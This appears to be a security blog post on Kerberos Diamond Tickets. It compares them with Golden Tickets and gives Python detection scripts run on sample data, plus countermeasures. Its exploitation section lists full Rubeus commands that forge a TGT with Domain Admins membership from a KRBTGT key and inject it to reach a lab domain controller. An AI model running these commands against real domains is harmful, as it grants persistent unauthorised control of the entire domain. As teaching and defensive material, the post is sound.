Tickets Kerberos - Diamond Ticket

Celia Catalán

Completing our series of posts on Kerberos tickets, we move on to the Diamond Ticket.

Like a Golden Ticket, a Diamond Ticket is a TGT that can be used to access any service as any user.

A Golden Ticket is created completely offline, encrypted with the KRBTGT hash of the domain in question, and then passed to a user session for use. Because domain controllers do not track TGTs they have legitimately issued, they will readily accept any TGT that is encrypted with their own KRBTGT account hash.

There are two common ways to detect the use of Golden Tickets:

  • Search for TGS-REQ requests that have no corresponding AS-REQ request
  • Search for TGTs with unusual values, such as a lifetime of 10 years, which Mimikatz sets by default

A Diamond Ticket is generated differently: by modifying the fields of a legitimate TGT previously issued by a DC. This is accomplished by first requesting a TGT, decrypting it with the domain's KRBTGT account key, modifying the desired fields of the ticket, and then re-encrypting it. In this way the two detections mentioned above for a Golden Ticket are avoided, since:

  • The TGS-REQ will have an associated AS-REQ
  • The TGT was issued by a DC, which means it will have all the correct details of the domain's Kerberos policy. While it is true that these details can be accurately falsified during the creation of a Golden Ticket, it is more complex and open to error.
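To make the two detections above concrete, here is an added example (not code from the original post, nor from Rubeus or Mimikatz) that runs both checks over constructed sample data. It assumes two normalised data sources a SIEM or EDR would typically provide, with field names that are our own assumption rather than any product's schema: KDC-side Kerberos request events (ts, client_ip, account, request_type) and an endpoint ticket-cache inventory with each ticket's start and end time. The sample contains a normal logon, a Golden Ticket used from a host that never sent an AS-REQ, and a Diamond Ticket whose AS-REQ exists and whose lifetime was inherited from the real TGT, so only the Golden Ticket is flagged.

```python
"""Two classic Golden Ticket checks over constructed sample data (added example)."""
from datetime import datetime, timedelta
from typing import Iterable

# Default domain policy for the maximum TGT lifetime is 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)
# How far back we accept an AS-REQ as the origin of a later TGS-REQ.
AS_REQ_WINDOW = timedelta(hours=10)


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def tgs_without_as(events: Iterable[dict]) -> list[dict]:
    """Detection 1: TGS-REQ events with no earlier AS-REQ for the same
    (client IP, account) inside AS_REQ_WINDOW."""
    last_as: dict[tuple[str, str], datetime] = {}
    hits = []
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        key = (ev["client_ip"], ev["account"].lower())
        ts = parse_ts(ev["ts"])
        if ev["request_type"] == "AS-REQ":
            last_as[key] = ts
        elif ev["request_type"] == "TGS-REQ":
            seen = last_as.get(key)
            if seen is None or ts - seen > AS_REQ_WINDOW:
                hits.append(ev)
    return hits


def oversized_tgts(tickets: Iterable[dict]) -> list[dict]:
    """Detection 2: cached TGTs whose lifetime exceeds the policy maximum
    (the 10-year default a forged ticket often carries)."""
    hits = []
    for t in tickets:
        if t["service"].lower().startswith("krbtgt/"):
            life = parse_ts(t["end"]) - parse_ts(t["start"])
            if life > MAX_TGT_LIFETIME:
                hits.append(t)
    return hits


# Constructed KDC events: a normal logon (jon.snow), a Golden Ticket used from
# 10.0.0.77 with no AS-REQ (administrator), and a Diamond Ticket (eddard.stark)
# whose TGS-REQ is preceded by a genuine AS-REQ.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01 08:00:00", "client_ip": "10.0.0.5", "account": "jon.snow", "request_type": "AS-REQ"},
    {"ts": "2024-05-01 08:00:01", "client_ip": "10.0.0.5", "account": "jon.snow", "request_type": "TGS-REQ", "service": "cifs/winterfell"},
    {"ts": "2024-05-01 09:15:00", "client_ip": "10.0.0.77", "account": "administrator", "request_type": "TGS-REQ", "service": "cifs/winterfell"},
    {"ts": "2024-05-01 10:00:00", "client_ip": "10.0.0.9", "account": "eddard.stark", "request_type": "AS-REQ"},
    {"ts": "2024-05-01 10:02:00", "client_ip": "10.0.0.9", "account": "eddard.stark", "request_type": "TGS-REQ", "service": "cifs/winterfell"},
]

# Constructed ticket-cache inventory: a policy-conformant TGT, a Golden Ticket
# with a 10-year lifetime, and a Diamond Ticket that kept the real TGT's times.
SAMPLE_TICKETS = [
    {"host": "ws01", "client": "jon.snow", "service": "krbtgt/NORTH", "start": "2024-05-01 08:00:00", "end": "2024-05-01 18:00:00"},
    {"host": "ws07", "client": "administrator", "service": "krbtgt/NORTH", "start": "2024-05-01 09:00:00", "end": "2034-04-29 09:00:00"},
    {"host": "ws09", "client": "eddard.stark", "service": "krbtgt/NORTH", "start": "2024-05-01 10:00:00", "end": "2024-05-01 20:00:00"},
]


def run_checks(events=SAMPLE_EVENTS, tickets=SAMPLE_TICKETS) -> dict:
    """Run both detections and return the accounts each one flags."""
    return {
        "tgs_without_as": [e["account"] for e in tgs_without_as(events)],
        "oversized_tgts": [t["client"] for t in oversized_tgts(tickets)],
    }


if __name__ == "__main__":
    # Both checks flag only the Golden Ticket; the Diamond Ticket passes cleanly.
    print(run_checks())
```

The point of the sample is the last two events and the last ticket: the Diamond Ticket passes both checks, which is exactly why the post argues it is the stealthier of the two and why the countermeasures later in the post lean on KRBTGT protection rather than on these two heuristics alone.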

Impact:

A Diamond Ticket, like a Golden Ticket, allows unlimited and persistent access to any resource within the domain until the krbtgt key is changed, which can be a complex and disruptive process.

Exploitation

As with the Golden Ticket, this technique presupposes a complete compromise of the domain, since it requires the key of the KRBTGT account.

Ticket creation

To create the Diamond Ticket, we are also going to use the Rubeus tool, executing the following command:

Rubeus.exe diamond /domain:north.sevenkingdom.local /user:eddard.stark /password:FightP3aceAndHonor! /ticketuser:eddard.stark /ticketuserid:1111 /groups:512 /krbkey:42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /nowrap

  • Domain: Domain name 
  • User: User with which the TGT to be modified will be requested
  • Password: Password of the user with which the TGT will be requested to modify
  • Ticketuser: User to impersonate
  • Ticketuserid: ID (the RID portion of the SID) of the user to impersonate
  • Groups: Groups that we want to be added to the ticket (512 -> Domain Admins)
  • Krbkey: AES256 key for the KRBTGT account

Import the ticket

Once the ticket is obtained, we can verify that we do not have SMB access to the Domain Controller.

ls \\winterfell\c$


To gain access, we first import the ticket into our session. We can use Rubeus again to achieve this:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username:eddard.stark /password:PassFake /ticket:doIFvT[…]LkxPQ0FM

  • Program: Command to execute where the ticket will be injected
  • Domain: Domain name
  • Username: Domain user
  • Password: User password. It is not necessary to know the user's real password
  • Ticket: The ticket created previously

Once the ticket is imported, we can access the DC, as we can see in the image.

ls \\winterfell\c$

Countermeasures:

  • Password Rotation: Regularly change passwords for service accounts. In particular, ensure that the KRBTGT account is protected and that its password is changed periodically, although carefully due to the significant impact it could have on the environment.
  • Service Account Security: Ensure that service accounts use strong, unique passwords.
  • Segmentation and Limitation of Privileges: Apply the principle of least privilege and segment the network to limit the scope of any potential compromise, ensuring that access to critical resources is restricted and monitored.
  • Audit and Monitoring: Configure audits and comprehensive monitoring of authentication activity and Kerberos ticket usage.
  • Proactive Monitoring and Detection: Implement advanced monitoring and detection solutions that can identify anomalous patterns and suspicious activities, including analysis of network traffic, authentication activity, and use of anomalous Kerberos tickets.
  • Regular Audits and Reviews: Perform regular security audits and permissions reviews to identify and correct any misconfigurations or potential vulnerabilities.
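One monitoring check that survives the evasions described above is worth showing, as an added example (not from the original post). The Diamond Ticket in this post carries RID 512 (Domain Admins) for eddard.stark even though the directory never granted it, so a logon that receives administrative privileges for an account outside the directory's privileged groups is a useful alert whichever way the ticket was forged. The inputs are constructed: a snapshot of privileged-group membership as an LDAP export would give it, and logon events shaped like Windows event 4672 ("Special privileges assigned to new logon") collected from a domain controller; the dictionary field names are our own assumption, not a product schema.

```python
"""Privileged-logon versus directory-membership check (added example)."""

# Groups whose members are expected to receive administrative privileges on a DC.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed directory snapshot: group -> members.
DIRECTORY = {
    "Domain Admins": {"administrator", "daenerys.targaryen"},
    "Enterprise Admins": {"administrator"},
    "Administrators": {"administrator"},
    "Domain Users": {"administrator", "daenerys.targaryen", "eddard.stark", "jon.snow"},
}

# Constructed 4672-style events from the DC. The eddard.stark logon is the one
# produced by a ticket whose PAC claims RID 512 without a matching directory change.
LOGON_EVENTS = [
    {"event_id": 4672, "account": "administrator", "host": "winterfell"},
    {"event_id": 4672, "account": "WINTERFELL$", "host": "winterfell"},
    {"event_id": 4624, "account": "jon.snow", "host": "winterfell"},
    {"event_id": 4672, "account": "daenerys.targaryen", "host": "winterfell"},
    {"event_id": 4672, "account": "eddard.stark", "host": "winterfell"},
]


def privileged_accounts(directory: dict[str, set[str]]) -> set[str]:
    """Union of the members of every group regarded as privileged."""
    out: set[str] = set()
    for group, members in directory.items():
        if group in PRIVILEGED_GROUPS:
            out |= {m.lower() for m in members}
    return out


def unexpected_privileged_logons(events, directory=DIRECTORY) -> list[tuple[str, str]]:
    """Return (account, host) pairs that received special privileges (4672)
    while the directory lists the account in no privileged group."""
    allowed = privileged_accounts(directory)
    hits = []
    for ev in events:
        if ev["event_id"] != 4672:
            continue
        acct = ev["account"].lower()
        # Machine accounts and the local SYSTEM logon legitimately carry these privileges.
        if acct == "system" or acct.endswith("$"):
            continue
        if acct not in allowed:
            hits.append((ev["account"], ev["host"]))
    return hits


if __name__ == "__main__":
    # Only eddard.stark is flagged: privileged logon, no privileged group in the directory.
    print(unexpected_privileged_logons(LOGON_EVENTS))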

Returning briefly to the fair metaphor, where one usually goes through many tickets, we leave you the following table as a summary:

Feature               | Silver Ticket                 | Golden Ticket                               | Diamond Ticket
Aim                   | Specific service              | Access to the entire domain                 | Access to the entire domain
Required credentials  | Specific service account      | Domain administrator or KRBTGT              | Domain administrator or KRBTGT
Impact                | Limited access to a service   | Unlimited domain access                     | Unlimited domain access
Attack complexity     | Moderate                      | High                                        | Very high
Key countermeasures   | Password rotation, monitoring | KRBTGT protection, comprehensive monitoring | KRBTGT protection, comprehensive monitoring

With this we conclude the tour of the different attractions. See you at the next fair, sorry, at the next installment.

Alvaro Themes, cybersecurity analyst at Zerolynx.